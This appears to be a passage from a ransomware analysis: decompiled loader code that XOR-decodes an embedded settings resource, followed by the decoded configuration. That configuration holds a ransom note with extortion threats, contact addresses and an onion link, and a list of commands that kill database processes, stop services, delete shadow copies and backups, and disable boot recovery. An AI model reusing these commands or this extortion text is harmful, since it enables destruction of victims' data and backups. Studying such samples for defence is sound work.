LODWORD(v145) = 0;
LODWORD(v144) = 0;
printf_0((
char
*)L
"[-] Load settings from resource...\n"
);
v123 = *(_OWORD *)get_length(&v126, L
"SETTINGS"
);
load_resource((
__int64
)v139, v1, (
const
WCHAR
**)&v123);
if
( !v139[0] )
{
v6 = 0;
v3 = Block[0];
goto
LABEL_180;
}
*(_QWORD *)&v123 =
"PUTINHUILO1337"
;
*((_QWORD *)&v123 + 1) = 14LL;
v129 = v123;
v2 = xor_data((
void
**)&pExceptionObject, (
__int64
)Block, (
__int64
*)&v129);
move_0(Block, v2);
debug055:00000223EA917340 aBchiperdrivesT db
'{'
,0Ah ; DATA XREF: Stack[00000A50]:00000062440FEA90↑o
debug055:00000223EA917342 db
'"bChiperDrives": true,'
,0Ah
debug055:00000223EA917359 db
'"bHideConsole": false,'
,0Ah
debug055:00000223EA917370 db
'"bRemoveRecycle": true,'
,0Ah
debug055:00000223EA917388 db
'"bThreadPool": false,'
,0Ah
debug055:00000223EA91739E db
'"nEncryptionBlockBytes": 750016,'
,0Ah
debug055:00000223EA9173BF db
'"nEncryptionLimitBytes": 2780352,'
,0Ah
debug055:00000223EA9173E1 db
'"nEncryptionSkipBytes": 250048,'
,0Ah
debug055:00000223EA917401 db
'"nEncryptionType": 1,'
,0Ah
debug055:00000223EA917417 db
'"nEncryptionTypeIO": 0,'
,0Ah
debug055:00000223EA91742F db
'"nThreads": 0,'
,0Ah
debug055:00000223EA91743E db
'"sEncryptedFileExtension": ".lock8",'
,0Ah
debug055:00000223EA917463 db
'"sMasterPublicKey": "BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHX'
debug055:00000223EA9174A4 db
'ZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4'
debug055:00000223EA9174E5 db
'Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox9'
debug055:00000223EA917526 db
'9fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKE'
debug055:00000223EA917567 db
'im/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRq'
debug055:00000223EA9175A8 db
'u0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830"'
debug055:00000223EA9175E9 db
','
,0Ah
debug055:00000223EA9175EB db
'"sRequirementsData": " YOUR COMPANY NETWORK HAS BEEN PENETRATED!'
debug055:00000223EA91762C db
'\n\n All your important files have been encrypted!\n\n '
debug055:00000223EA91766D db
' Your files are safe! Only modified. (RSA+AES)\n\n ANY ATTEM'
debug055:00000223EA9176AE db
'PT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE\n WILL PERMAN'
debug055:00000223EA9176EF db
'ENTLY CORRUPT IT.\n DO NOT MODIFY ENCRYPTED FILES.\n DO NOT REN'
debug055:00000223EA917730 db
'AME ENCRYPTED FILES.\n\n No software available on internet can h'
debug055:00000223EA917771 db
'elp you. We are the only ones able to\n solve your problem.\n\n '
debug055:00000223EA9177B2 db
' We gathered highly confidential/personal data. These data are cu'
debug055:00000223EA9177F3 db
'rrently stored on\n a private server. This server will be immedi'
debug055:00000223EA917834 db
'ately destroyed after your payment.\n If you decide to not pay, '
debug055:00000223EA917875 db
'we will release your data to public or re-seller.\n So you can e'
debug055:00000223EA9178B6 db
'xpect your data to be publicly available in the near future..\n\n'
debug055:00000223EA9178F7 db
'\n We only seek money and our goal is not to damage your reputat'
debug055:00000223EA917938 db
'ion or prevent\n your business from running.\n\n You will can s'
debug055:00000223EA917979 db
'end us 2-3 non-important files and we will decrypt it for free\n '
debug055:00000223EA9179BA db
' to prove we are able to give your files back.\n pomocit07@kanze'
debug055:00000223EA9179FB db
'nsei.top\n pomocit07@surakshaguardian.com\n To contact us, crea'
debug055:00000223EA917A3C db
'te a new free email account on the site: e24K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6H3M7X3!0@1L8$3&6E0j5h3W2D9i4K6u0W2j5$3!0E0i4K6g2o6L8W2)9J5y4H3`.`.
debug055:00000223EA917A7D db
'\n\n YOU DON'
,27h,
'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE '
debug055:00000223EA917AB8 db
'HIGHER.\n\n TOR LINK>>>>>>>>> qd7pcafncosqfqu3ha6fcx4h6sr7tzwa'
debug055:00000223EA917AF9 db
'gzpcdcnytiw3b6varaeqv5yd.onion\n",'
,0Ah
debug055:00000223EA917B1C db
'"sRequirementsFilename": "How_to_back_files.txt",'
,0Ah
debug055:00000223EA917B4E db
'"vecFullEncryptionExtensions": [],'
,0Ah
debug055:00000223EA917B71 db
'"vecPostRunCommands": [],'
,0Ah
debug055:00000223EA917B8B db
'"vecPreRunCommands": ['
,0Ah
debug055:00000223EA917BA2 db
'"rem Kill \"SQL\"",'
,0Ah
debug055:00000223EA917BB6 db
'"taskkill -f -im sqlbrowser.exe",'
,0Ah
debug055:00000223EA917BD8 db
'"taskkill -f -im sql writer.exe",'
,0Ah
debug055:00000223EA917BFA db
'"taskkill -f -im sqlserv.exe",'
,0Ah
debug055:00000223EA917C19 db
'"taskkill -f -im msmdsrv.exe",'
,0Ah
debug055:00000223EA917C38 db
'"taskkill -f -im MsDtsSrvr.exe",'
,0Ah
debug055:00000223EA917C59 db
'"taskkill -f -im sqlceip.exe",'
,0Ah
debug055:00000223EA917C78 db
'"taskkill -f -im fdlauncher.exe",'
,0Ah
debug055:00000223EA917C9A db
'"taskkill -f -im Ssms.exe",'
,0Ah
debug055:00000223EA917CB6 db
'"taskkill -f -im SQLAGENT.EXE",'
,0Ah
debug055:00000223EA917CD6 db
'"taskkill -f -im fdhost.exe",'
,0Ah
debug055:00000223EA917CF4 db
'"taskkill -f -im ReportingServicesService.exe",'
,0Ah
debug055:00000223EA917D24 db
'"taskkill -f -im msftesql.exe",'
,0Ah
debug055:00000223EA917D44 db
'"taskkill -f -im pg_ctl.exe",'
,0Ah
debug055:00000223EA917D62 db
'"taskkill -f -impostgres.exe",'
,0Ah
debug055:00000223EA917D81 db
'"net stop MSSQLServerADHelper100",'
,0Ah
debug055:00000223EA917DA4 db
'"net stop MSSQL$ISARS",'
,0Ah
debug055:00000223EA917DBC db
'"net stop MSSQL$MSFW",'
,0Ah
debug055:00000223EA917DD3 db
'"net stop SQLAgent$ISARS",'
,0Ah
debug055:00000223EA917DEE db
'"net stop SQLAgent$MSFW",'
,0Ah
debug055:00000223EA917E08 db
'"net stop SQLBrowser",'
,0Ah
debug055:00000223EA917E1F db
'"net stop REportServer$ISARS",'
,0Ah
debug055:00000223EA917E3E db
'"net stop SQLWriter",'
,0Ah
debug055:00000223EA917E54 db
'"vssadmin.exe Delete Shadows /All /Quiet",'
,0Ah
debug055:00000223EA917E7F db
'"wbadmin delete backup -keepVersion:0 -quiet",'
,0Ah
debug055:00000223EA917EAE db
'"wbadmin DELETE SYSTEMSTABACKUP -deleteOldest",'
,0Ah
debug055:00000223EA917EDE db
'"wmic.exe SHADOWCOPY /nointeractive",'
,0Ah
debug055:00000223EA917F04 db
'"bcdedit.exe /set {default} recoverynabled No",'
,0Ah
debug055:00000223EA917F34 db
'"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"'
,0Ah
debug055:00000223EA917F74 db
'],'
,0Ah
debug055:00000223EA917F77 db
'"vecProgramFilesPath": ['
,0Ah
debug055:00000223EA917F90 db
'"\\Microsoft SQL Server\\",'
,0Ah
debug055:00000223EA917FAC db
'"\\Microsoft SQL Server Management Studio 18\\"'
,0Ah
debug055:00000223EA917FDC db
'],'
,0Ah
debug055:00000223EA917FDF db
'"vecSkipFileExtensions": ['
,0Ah
debug055:00000223EA917FFA db
'".exe",'
,0Ah
debug055:00000223EA918002 db
'".dll",'
,0Ah
debug055:00000223EA91800A db
'".sys",'
,0Ah
debug055:00000223EA918012 db
'".ini",'
,0Ah
debug055:00000223EA91801A db
'".rdp",'
,0Ah
debug055:00000223EA918022 db
'".lnk",'
,0Ah
debug055:00000223EA91802A db
'".bmp",'
,0Ah
debug055:00000223EA918032 db
'".mov",'
,0Ah
debug055:00000223EA91803A db
'".cab",'
,0Ah
debug055:00000223EA918042 db
'".url",'
,0Ah
debug055:00000223EA91804A db
'".vsix",'
,0Ah
debug055:00000223EA918053 db
'".msi",'
,0Ah
debug055:00000223EA91805B db
'".pyc",'
,0Ah
debug055:00000223EA918063 db
'".pyd",'
,0Ah
debug055:00000223EA91806B db
'".vdm",'
,0Ah
debug055:00000223EA918073 db
'".json"'
,0Ah
debug055:00000223EA91807B db
'],'
,0Ah
debug055:00000223EA91807E db
'"vecSkipPaths": ['
,0Ah
debug055:00000223EA918090 db
'"C:\\perflogs",'
,0Ah
debug055:00000223EA9180A0 db
'"C:\\Intel",'
,0Ah
debug055:00000223EA9180AD db
'"C:\\HP",'
,0Ah
debug055:00000223EA9180B7 db
'"C:\\AMD",'
,0Ah
debug055:00000223EA9180C2 db
'"C:\\Dell",'
,0Ah
debug055:00000223EA9180CE db
'"C:\\Drivers",'
,0Ah
debug055:00000223EA9180DD db
'"C:\\inetpub",'
,0Ah
debug055:00000223EA9180EC db
'"B:\\Boot",'
,0Ah
debug055:00000223EA9180F8 db
'"A:\\Boot",'
,0Ah
debug055:00000223EA918104 db
'"B:\\EFI",'
,0Ah
debug055:00000223EA91810F db
'"A:\\EFI",'
,0Ah
debug055:00000223EA91811A db
'"C:\\ProgramData\\AnyDesk",'
,0Ah
debug055:00000223EA918136 db
'":\\Boot",'
,0Ah
debug055:00000223EA918141 db
'"\\appdata\\"'
,0Ah
debug055:00000223EA91814F db
']'
,0Ah,
'}'